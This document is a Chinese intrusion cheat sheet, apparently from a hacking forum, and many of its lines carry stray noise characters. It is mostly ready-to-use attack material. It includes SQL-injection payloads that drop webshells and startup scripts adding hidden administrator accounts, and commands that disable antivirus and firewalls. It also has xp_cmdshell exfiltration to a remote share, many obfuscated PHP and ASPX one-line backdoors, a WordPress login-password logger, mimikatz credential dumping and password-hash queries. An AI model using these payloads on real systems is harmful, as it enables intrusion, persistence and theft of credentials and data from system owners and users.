% w# | V7 D6 Z0 minsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );. Q7 |/ C% w1 P8 k8 u8 i
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );% g7 S6 s8 B# [0 Q# v4 G9 b
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";5 K A5 ]' ?* K z! m
drop table a;7 e4 M: m/ k7 x" \: ^" R: u
( N: \9 ~5 d. c
英文版本:) D0 V1 m( A% y# V7 t! q
( R( i3 u( P, z* [* Wuse test;
; R I# f/ g8 i7 Q9 X9 a Ycreate table a (cmd text);
3 k+ |( L1 ?. l+ S1 a- Jinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
( Y( G9 t2 d8 f5 @insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );8 ~. `! o: g) S- p1 ?) o
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
( U ~/ Q1 [. s, ?6 j4 Aselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
9 j( f/ V4 ^) y. Z) V- Udrop table a;( m- ?' T% s" o4 i! ]. e7 w: Q- [
+ l$ M! B% S# f! ^: o0 b6 N
create table a (cmd BLOB);
' D0 t( t Y" Y2 ~insert into a values (CONVERT(木马的16进制代码,CHAR));
" ~/ Q9 V9 x) Oselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'! X1 T9 M1 {4 f4 ?- a; w
drop table a;, _. Y" G$ g# T
" {# X5 P& @- H% |# C& C
记录一下怎么处理变态诺顿
, l) F% Q n+ [7 Q查看诺顿服务的路径6 F! m! B+ M I# ?
sc qc ccSetMgr
+ ^& W3 O: |# s1 |然后设置权限拒绝访问。做绝一点。。
4 M A7 @' i' M9 Gcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
: n, W* S5 a0 B! \1 mcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"3 d7 a, d- p3 R5 l
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
% p) {; S1 c5 O# I, Bcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
: A. q) ^ _! H O. H& k) U; C
- _2 G4 ?% O1 K! x然后再重启服务器! |7 J8 q0 l" F7 a7 T
iisreset /reboot
0 C$ ]& O* r) m6 ?5 h/ ]这样就搞定了。。不过完事后。记得恢复权限。。。。7 B, f5 p6 I6 q, H. c
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
# N+ ?& O; R# acacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F5 D6 }% S$ D# g* h
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F/ [: C6 t: n+ y. a' n% l$ F/ i
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F3 d$ ?+ c+ M# s" H3 d" r
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
) A+ E0 y3 W, J) |+ i* @
: b0 w/ Z+ e# Z5 s2 w" ZEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')% S+ u5 x b# @, Z
( c8 g' E6 [ C$ x& y8 |* Lpostgresql注射的一些东西
+ ]3 s% f, Q( L如何获得webshell+ O5 Y! O0 F0 @$ o; }6 @
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
) {" B& Q" b P7 \2 Y! R2 k& Bhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); ! ]% F& U0 O# O; M
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
' L e& R8 B; Z/ ~' A: f如何读文件
! B$ q% z% {8 }http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);) v5 c" c ?4 W7 L. t
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;& L8 O' n7 R5 [# E; v
http://127.0.0.1/postgresql.php?id=1;select * from myfile;- F% h0 L( w, V% \) L$ {
2 f2 ~# u6 y' E" G
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。/ O) r9 s6 H0 F- B5 S- }: J
当然,这些的postgresql的数据库版本必须大于8.X
- d6 G6 D2 x6 e& r创建一个system的函数:
0 F% L+ E7 W, y. S% k0 b% mCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
4 e- B/ H& \- ]+ L# s! T0 U* {3 \2 e. s
创建一个输出表:
5 l% @2 T2 c; U6 {7 f4 o, d3 r: u" _CREATE TABLE stdout(id serial, system_out text)/ u8 @' x# P) q/ d
8 [7 ?' N. N; n; X. ?执行shell,输出到输出表内:4 A' D$ x5 W, M1 K/ H" S& l
SELECT system('uname -a > /tmp/test')* u6 X- H$ o& a! k' a
% i, L4 h* V( N. D
copy 输出的内容到表里面;
& }& U% Z' c' M, }2 f, n' UCOPY stdout(system_out) FROM '/tmp/test'
9 ~! l( x9 j+ r2 R* e [* U: ]; w
从输出表内读取执行后的回显,判断是否执行成功
& h. F5 o4 L3 O, O3 i4 u) \" \0 ^ ?) x
SELECT system_out FROM stdout
- k& D, G% @( N. A下面是测试例子
4 ~( o, q! o4 v' v) E0 o- N! h8 q0 P$ u( D5 x8 `5 d0 x
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
, L. ^' Z; `5 O2 L; V. U, l5 q$ W( \5 d, P% E
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'6 W2 T, W4 G+ v3 \ f
STRICT --
2 |! N% R9 r8 j6 `: |$ u: `2 V' o' d( ?( t
/store.php?id=1; SELECT system('uname -a > /tmp/test') --8 ~% p0 G4 ~5 e# g
& C$ |8 I, U9 t) [+ N# C& B X: f/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
9 ^9 t% C K. v+ T( L! @! F3 \1 s" S5 B9 n9 e0 y: z5 Y
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
& w B' l8 M3 ~' ~net stop sharedaccess stop the default firewall- v6 u# \* ]1 \3 S' y: X
netsh firewall show show/config default firewall: Y6 R8 X( n3 l/ s
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
3 _6 N0 J- c4 ]) E9 ?- qnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
) o* J7 R8 {2 T5 F3 w5 X7 g修改3389端口方法(修改后不易被扫出)
+ y! u5 u* q& k" D修改服务器端的端口设置,注册表有2个地方需要修改/ O# ?: |7 v0 b) J# g$ A5 M. G
0 b4 V: q7 i( K9 o5 i/ D
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]; V9 }: C4 J* U# {' H9 F! a
PortNumber值,默认是3389,修改成所希望的端口,比如6000; G0 ^) S& G' b, H8 q' a7 U
0 L4 R7 G) g" D
第二个地方:
% D3 c7 V- {/ h* n; |: `. Z[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
3 h: x4 P# K8 r9 E9 `- fPortNumber值,默认是3389,修改成所希望的端口,比如6000
! b( T, e9 i' {# s* H& B
3 K P% @0 Y+ i4 U0 O现在这样就可以了。重启系统就可以了. O4 a3 Z9 G/ i0 [) w7 X3 ]5 {& f
7 l; D @+ |7 c( q9 a7 Z* x
查看3389远程登录的脚本
( N0 R I2 A- o" |4 k/ c1 t8 n8 A保存为一个bat文件+ E; r: I* G2 r2 [, s: q
date /t >>D:\sec\TSlog\ts.log; v7 A2 j' S! T* p( g4 p4 O
time /t >>D:\sec\TSlog\ts.log
( R" x* j5 s2 nnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
+ r9 [4 G- Q' [# s% ]" v Kstart Explorer0 e& t' V0 o8 I. R4 n7 S& k
! R: _; y4 ?: ?7 F0 l: P
mstsc的参数:
+ Q) q! h* X. n u6 e) o
, A6 t# P2 ^" y远程桌面连接
2 y% L/ M; D! y T- o0 t# v* ]& {0 G; \: G6 z3 o
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
4 o! ^3 I2 _3 R9 {. h. _. L4 y" r [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?' |. c% B& ^, s
7 Y9 I( A/ C( M. G y5 ]% b: ^% w' q
<Connection File> -- 指定连接的 .rdp 文件的名称。6 G9 m$ H0 u8 R* ]; c6 a0 N
0 ]8 m% v7 h" J B. ]7 T8 l5 i2 a7 X
/v:<server[:port]> -- 指定要连接到的终端服务器。
+ Y8 g4 x7 k) p/ Q3 f$ A
8 R2 |1 ~/ c& x! v2 B/console -- 连接到服务器的控制台会话。% P5 q0 g' i- g" U* m
7 B, A6 [2 j: W; C; m9 F, Z
/f -- 以全屏模式启动客户端。
) P/ t1 |" h; A4 C
7 \3 W% V) t5 V4 p* _# M7 m/w:<width> -- 指定远程桌面屏幕的宽度。
0 Y7 T H+ {, A& w
C8 ?3 [6 n9 v- D& r/h:<height> -- 指定远程桌面屏幕的高度。
8 r. ~2 R1 \% O! h; I4 n
6 \* X( B6 I6 \8 `4 b! O3 }; a/edit -- 打开指定的 .rdp 文件来编辑。
( i. `* x$ s$ `+ D% T: P' B( Q" g: Z) v
/migrate -- 将客户端连接管理器创建的旧版
- p: G6 s( K5 n, ^6 w7 j! U连接文件迁移到新的 .rdp 连接文件。
) j; B* A1 u, V6 g9 M4 k
3 u# S0 d, y9 S( v/ d( g0 ?$ x# l$ y5 D, D
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
" u! n) N' K: l+ Hmstsc /console /v:124.42.126.xxx 突破终端访问限制数量
7 H9 i5 m1 k; i2 d/ d5 {/ @0 S' V3 k
命令行下开启3389' s1 h m1 _. x6 {$ x
net user asp.net aspnet /add `- a: X7 T' k* w
net localgroup Administrators asp.net /add
+ u" D. m: \( T" V* `& _net localgroup "Remote Desktop Users" asp.net /add
: }3 M, D" R' u3 _( o6 t5 s2 Battrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
) s8 g: W1 D' _% E2 ~3 lecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
% X/ Y& D- |; W' S+ \$ e( ~echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1& ^. A1 @ d" ^: z4 C7 k3 O) t. L
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f. [6 K" M8 g* K/ {. F
sc config rasman start= auto
! h2 w* m2 }& T/ nsc config remoteaccess start= auto
6 Y, ^" V7 t, V- pnet start rasman. \6 P# q& t& L# p" G+ P( B0 i% U
net start remoteaccess
% [- \- ^0 A) h9 j" t; _Media
- e) F. H9 I$ l7 I7 h9 t1 [, s<form id="frmUpload" enctype="multipart/form-data"" a( f! Z" {; o6 {* H
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>5 l6 s ^7 l1 Y7 X5 Y$ F
<input type="file" name="NewFile" size="50"><br>5 ]3 ~% ^, I; m
<input id="btnUpload" type="submit" value="Upload">/ d5 m/ E# \, Y$ f, g7 M' G; L
</form>
- m" }# r" L1 ]6 k
# L0 H! }3 p/ f0 [) K8 K( Tcontrol userpasswords2 查看用户的密码
7 q) E: k/ M9 B! M9 K" J$ T8 D* Caccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
7 V( i) B$ @4 a W- d) m# YSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
5 l7 }7 z5 q* D: K( Z0 T/ L- i! q, M5 Q, Q1 N8 m8 M; B4 ^4 g
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:% Y+ i4 Q+ g) z; k: }
测试1:
9 v1 P5 n0 [( O+ lSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1/ ]+ M5 P+ P, B6 D
8 A9 z3 K% V3 { F4 n9 |
测试2:% N$ Y# h4 R5 x' U$ \" V* A
. p: d- S" q7 a# I) g) Y( qcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
; P5 X8 O1 v: s; Q' H! [; P2 l& I6 N& w. P) R/ C2 ~
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
+ `1 e# u |& i
. @& S( J6 N3 u% n& e4 ]" e; }, PSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
9 `7 o1 b5 I5 ?关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令7 f/ p! U% t( j( B1 e
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
5 M4 S$ [2 n5 i: G( j$ S; s. nnet stop mcafeeframework
/ d& W3 r, T/ {% G7 onet stop mcshield
/ C! s5 J8 D' M, K1 V, Nnet stop mcafeeengineservice
$ V9 P. u1 W' \( B* znet stop mctaskmanager
$ G8 e* v, f- E5 m9 x% p) Yhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D% A8 E3 m* @6 x l
# v& J! x/ P2 @
VNCDump.zip (4.76 KB, 下载次数: 1) 6 i) _$ ^" H9 Q/ c- n
密码在线破解http://tools88.com/safe/vnc.php6 G, _8 b; c$ u/ u. f+ n
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取/ B! h2 L! s+ a/ Z) Y' ]! J
4 s, p% f) E3 l4 F0 P6 m; h
exec master..xp_cmdshell 'net user'
+ ]( l6 \ t& k8 L7 Z1 }6 \" [mssql执行命令。/ t @5 S X) @$ R" U8 r3 O
获取mssql的密码hash查询, N) O G1 [& t2 b. G3 G
select name,password from master.dbo.sysxlogins
0 c* P1 ~1 P6 W3 r4 E3 z D2 y
" ]: q! G5 U2 Xbackup log dbName with NO_LOG;0 u# E6 u- y9 s3 R$ r( J) l
backup log dbName with TRUNCATE_ONLY;
" x- a0 m& y5 e3 G$ ~DBCC SHRINKDATABASE(dbName);
* Q. a5 [5 K g9 e$ D* fmssql数据库压缩! S- L G* M3 ^* b9 L
% b% a+ I& x! _
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
& E, I- m5 X$ s$ n* O将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
! l" g, F2 [4 E8 A9 F: Y% T
5 Y [/ T% r# o3 ubackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'% t- j% L: ]7 b( j) B8 j
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
) u1 a% X! ^) v% u8 E. n! X: a
* m& @" z0 X3 S" B) L4 jDiscuz!nt35渗透要点:7 j! q+ _ _4 C0 n( N O. f
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
. s. G5 R% E& D* d: i$ q(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%># [# e7 B3 L8 t) z! M0 `1 L0 r' k
(3)保存。6 r8 p. j# W- t% d) x
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
, @# p! ~) S8 z7 S) l) ^# ~4 w# v& Hd:\rar.exe a -r d:\1.rar d:\website\4 p! f: N- \7 `/ K3 C6 g& ?5 ~. q
递归压缩website- f/ T7 Y& V' e- c2 _
注意rar.exe的路径
) C2 ~3 ]' |6 a+ `4 E/ a% R p$ |2 f4 L" u
<?php$ k" |$ O2 }; Q3 w0 Y
/ {& q* T/ t7 [1 [% C$ c
$telok = "0${@eval($_POST[xxoo])}";+ s4 H( }9 _) @# F0 R
" U0 O8 R1 D, K$ y0 I) i
$username = "123456";$ X b% A2 o4 G! `1 q+ N5 o
, q4 X* H- k% x) R6 X
$userpwd = "123456";
6 q9 ~8 d0 y2 i" y
# h. `" R) G W6 h$telhao = "123456";
+ t# R4 N- h/ }0 x) _& L& c" W, R% M
% q6 O; N. }4 r, t' v$telinfo = "123456";) W+ t5 T3 z9 d6 o
+ B1 n" h% B( [: l a( Y
?>- f1 \, [$ E3 q' ?7 x) u) x
php一句话未过滤插入一句话木马; ^& X, x: z0 M. [, ^4 i# `
" M p8 V* H$ y" S2 |# ~/ ]9 u
站库分离脱裤技巧6 ?7 N* u3 @+ p) |+ D" e: w7 Q
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
+ |* n/ d- H7 i3 Oexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'. @1 k9 H) t% {9 A
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。! o7 O. K [/ Q2 ?( b
这儿利用的是马儿的专家模式(自己写代码)。0 ~/ m0 a% T6 l' B! _
ini_set('display_errors', 1); Y/ D! J# ~5 R9 F9 m* b
set_time_limit(0);
" [; J8 U0 `6 m2 w! Oerror_reporting(E_ALL);4 p( R7 z5 `3 D# A
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());/ M) @. N8 R/ ~+ x" r6 n
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());0 K7 k! D; Q0 _3 ^
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());* v# @, |& {( {6 F/ D
$i = 0;
+ g* X" q7 x( m8 I8 v! e$tmp = '';
3 u7 o4 x# W* C+ T: xwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
9 `% q2 h4 Z; R3 I/ {1 m $i = $i+1;3 c9 r* P! B0 a t
$tmp .= implode("::", $row)."\n";) |. E% |1 A& o( Q6 r0 o
if(!($i%500)){//500条写入一个文件
6 s7 ]5 f, n! b $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';: }) o8 B- v0 Z& {
file_put_contents($filename,$tmp);% ?5 j' r3 L( n h8 M
$tmp = '';$ D2 k, g3 v- O. @# ?' X( O) u
}
: j; P# F; P4 `, v# z% D) n}
; S5 C/ i6 B/ B! W( [mysql_free_result($result);
, [9 T9 G% a# Q
7 j& Y) e& \) ^% p( V& p2 V' Z- t( A8 z! L L
4 v& R- j K4 _5 U
//down完后delete) ^* L" j! \8 l; H) m6 d+ D* t
$ g! I/ \9 H6 b; l! t) h, r
0 X: s8 M7 e* h9 V/ m* {. N1 \ini_set('display_errors', 1);4 N% n; w1 k6 }9 w" F) j4 t
error_reporting(E_ALL);
) Z2 i5 @9 q# ]9 \$i = 0;
; h" p% V `- N) h+ E) C5 u5 nwhile($i<32) {$ n, x/ w* b! S( E' g3 A
$i = $i+1;: Z0 V9 E. r! F4 \! [
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
7 A; ~: P4 `) C/ y) m/ k' A" `( G unlink($filename);
, e3 g* ^: D( p8 `} - S1 r0 n; ^2 T4 h# J0 ~* K5 b
httprint 收集操作系统指纹9 h6 F0 o1 X, L% C9 v) N" o; t+ z
扫描192.168.1.100的所有端口 Z: D1 r* w' T6 x1 U
nmap –PN –sT –sV –p0-65535 192.168.1.1008 C0 g2 _' r6 g" j: }% K% B
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
Z8 E; D- ?6 r# E: v7 ghost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输1 j" z7 @ {) n4 f
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
+ L4 F# |0 ]- {0 \- U @! u" C# ~
4 \6 n3 U3 \4 o- X8 qDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)/ ?( [" F6 B* n% S/ y2 V1 S0 }9 x
2 ^( x- V9 b) w% {. @5 C MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
. g# Y/ h8 t" c8 h* ]1 F2 D8 b( q/ m* o/ Z9 A
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
3 q% B6 A- W; T
# X# x3 P1 }" [" ? DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
! x- r6 {6 m- w$ h! L
# R: ? N. b* }* Y& e http://net-square.com/msnpawn/index.shtml (要求安装)
$ b5 z0 _- X5 d2 b2 p2 ^6 O
( G! A9 V) z* s: _, c8 w* s tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
) S; l/ F- ]4 f1 U0 D; x" }: t l: y5 g0 {
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)' i: h4 @" k9 B% ]: G# c
set names gb2312
' L4 G3 c. B4 L4 X' ^! J. k, o导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
4 m Z3 c2 [5 K. S% g A' a, `# k+ M
mysql 密码修改4 @, I4 C* M# e& R
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” 8 I& o% f) b1 q/ P6 b f
update user set password=PASSWORD('antian365.com') where user='root';
# s& K' u6 |8 F) b0 \flush privileges;
6 t) A6 A7 M3 H$ X; l+ N高级的PHP一句话木马后门
9 Z: v) v: v6 p9 X# }" s0 N% q [0 n8 ]
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀5 |8 l4 R2 O2 {5 W& W. _& {
( ?' L9 e; e) K* r. p, H: t/ Z1、
7 D) i( i3 v) Y7 T) d
; p4 m- i8 x4 `7 \! m. }$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
. p5 c" j+ S- m7 m( J8 }% f+ C0 }2 ?, Z; T9 n& J$ y0 ]. ^; }: Q# @6 q
$hh("/[discuz]/e",$_POST['h'],"Access");
, g( c6 G* g' C7 k$ M
' h' Q: X: ~! k5 x C//菜刀一句话
* p1 ^9 o. X+ E2 K! O0 D
3 N u# \4 ~6 i! D. B; W2、0 [0 `9 D6 V- N5 \+ C( Y& }
: X2 g2 M+ x: Z3 {- J) R3 m
$filename=$_GET['xbid'];" _/ F/ O m8 E2 S: Z$ h6 _: v% D9 V
$ q( ?# v% u vinclude ($filename);! t+ a3 i2 \; R: d7 s. y( n$ I) o% [
# s3 G# Q; o# L- A2 z& L
//危险的include函数,直接编译任何文件为php格式运行
) f4 e2 I9 n' [& h; d* M& M
1 L, \! l0 [( Q. |& q& R# }3、
7 B! W! t1 U( p; s8 B9 c$ t
, l4 s9 _! W4 H" b! ?. a$reg="c"."o"."p"."y";% }. M) m9 {% y- _) m3 w
0 H5 c* R0 f, J
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);! y0 h" k& ]3 Q! A2 p' a
" Y) m4 q2 U. Z. A/ V//重命名任何文件 k6 X9 M, E7 [, Q' \9 s
) }$ C8 \4 H& ~9 H" V5 ] |/ x4、# c& ?( d7 s$ u! W/ [, N
7 S! B N- b- Q$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
9 u( r+ k' \2 B1 d6 M' {7 D& f, ~" U! i6 \- `5 w" T
$gzid("/[discuz]/e",$_POST['h'],"Access");( A% L5 u* k% o \: A
# Y3 {: B7 g7 Q% G9 L//菜刀一句话
- D. I" p: O8 g
% l. Y, ~) D6 t5、include ($uid);
/ n' c0 [* J2 \ [$ x6 Q5 V2 Q! p# L% w [
//危险的include函数,直接编译任何文件为php格式运行,POST
2 a' V, m1 v9 ]5 L( f
/ J0 H8 A5 [- ^; K4 T
9 p! n u" V' e$ ^. W' a; \% b//gif插一句话, D8 W# \7 ?5 a
8 V8 ^) f' E: z* ]
6、典型一句话
5 b! ]2 W+ S8 W# z9 P7 M+ j F5 W; X: |3 {, u0 B
程序后门代码
0 [) L. r6 p/ X( D* K<?php eval_r($_POST[sb])?>& R5 O2 R3 ]; a' r
程序代码
, w/ W n* \, C<?php @eval_r($_POST[sb])?>
`3 L2 W8 [/ _& |//容错代码- M' G& n7 g" U6 l0 X `% G1 J
程序代码2 c( U, G4 p6 _; {; m$ A( s" h
<?php assert($_POST[sb]);?>
0 x1 X8 `8 o0 g/ d//使用lanker一句话客户端的专家模式执行相关的php语句
* c9 ?: _: L0 c" |程序代码8 {; l) ^2 X3 I2 k; P) X5 w
<?$_POST['sa']($_POST['sb']);?>9 q' u# \! c2 x
程序代码
6 N. `; C7 G! v& }6 l Q1 E5 t<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
# E3 |( G" x5 J& r' h程序代码
* v0 s8 G# ~; m, h$ q$ O<?php
% B1 b- R. w( i@preg_replace("/[email]/e",$_POST['h'],"error");- Z: H, b8 D, H9 T8 t! m/ P; x
?>1 k* s( }) v& ?# C* U
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
; E" k7 T: Q/ R2 M程序代码# t' E# h6 X' T z( Y+ R% i0 X
<O>h=@eval_r($_POST[c]);</O>
" [! J7 A+ s7 G0 z) A* U程序代码# D' n' a3 A$ t8 L
<script language="php">@eval_r($_POST[sb])</script>
) J5 O0 n) m2 S//绕过<?限制的一句话
0 L# _5 b5 O! f+ V" T
/ k$ T2 V% l- W' a# E) chttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
! o, l3 I$ J1 Y3 i详细用法:
( j$ }6 f" n; o. j" l2 G1 J1、到tools目录。psexec \\127.0.0.1 cmd
9 P% }0 E) h* a& T N/ a2、执行mimikatz" y# @5 R0 ~2 s4 \
3、执行 privilege::debug9 ^7 S0 G5 M8 F. o
4、执行 inject::process lsass.exe sekurlsa.dll
% v) X( O& v8 D+ B# A& G' o5、执行@getLogonPasswords
. P7 h Z) D8 l% l% G& ^7 I6、widget就是密码
' f) W, d, R5 v9 O7 m3 M, i9 R- ]7、exit退出,不要直接关闭否则系统会崩溃。% M4 x( }' N6 B1 ]6 d V- f, D! e
/ W: G0 l! e2 }- b5 b; W- K
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
d( L) H) e* K0 X% d% O" t; P; K* S* D
自动查找系统高危补丁) t6 n O, H" h& _
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt+ q$ N+ m9 v7 c6 K# G' j
u. Z5 r3 b' c突破安全狗的一句话aspx后门0 n M" B% J$ ?1 }6 |
<%@ Page Language="C#" ValidateRequest="false" %>
" g7 H' C6 j, N; c5 ?<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>% a7 N8 X* _+ T" m6 L& N
webshell下记录WordPress登陆密码( `+ b7 w6 r7 U( I' a
webshell下记录Wordpress登陆密码方便进一步社工
7 Q* B3 c( K2 r9 ~- H& v/ x在文件wp-login.php中539行处添加: \: J% `$ K. i+ ^
// log password
/ ?, L1 A: @8 q. ]1 R4 K$log_user=$_POST['log'];
7 q8 Q* i7 Q/ T2 _" t$log_pwd=$_POST['pwd'];& a& ^ y% X. `( V( `
$log_ip=$_SERVER["REMOTE_ADDR"];6 q# k/ y$ G: A2 s {! s
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
2 v- ]1 T5 j. z0 e$txt=$txt.”\r\n”;' e/ t8 D! X3 b3 ^! ?3 M2 E, p
if($log_user&&$log_pwd&&$log_ip){# S: k" {2 l7 s5 B8 u
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
) P, A' z) ?6 J* r# z# C}7 S/ h1 h* e" [5 Y# i! C8 V+ C. W
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。* w- p( H5 I. h; W' r8 c! o
就是搜索case ‘login’$ M, Z" E" z/ \ h8 o
在它下面直接插入即可,记录的密码生成在pwd.txt中,
2 U% J( _' ~ p, W% E2 h# u其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
8 i' }/ ` y2 Y+ u I利用II6文件解析漏洞绕过安全狗代码:
4 T4 e1 Q1 `! _) f% L;antian365.asp;antian365.jpg6 d- ]* o$ S% [8 O5 ]- V
+ A+ m& X5 J& C8 Y( S
各种类型数据库抓HASH破解最高权限密码!
. N& t7 x' `: o# o1.sql server2000( ^' E* d3 h. U: z
SELECT password from master.dbo.sysxlogins where name='sa'
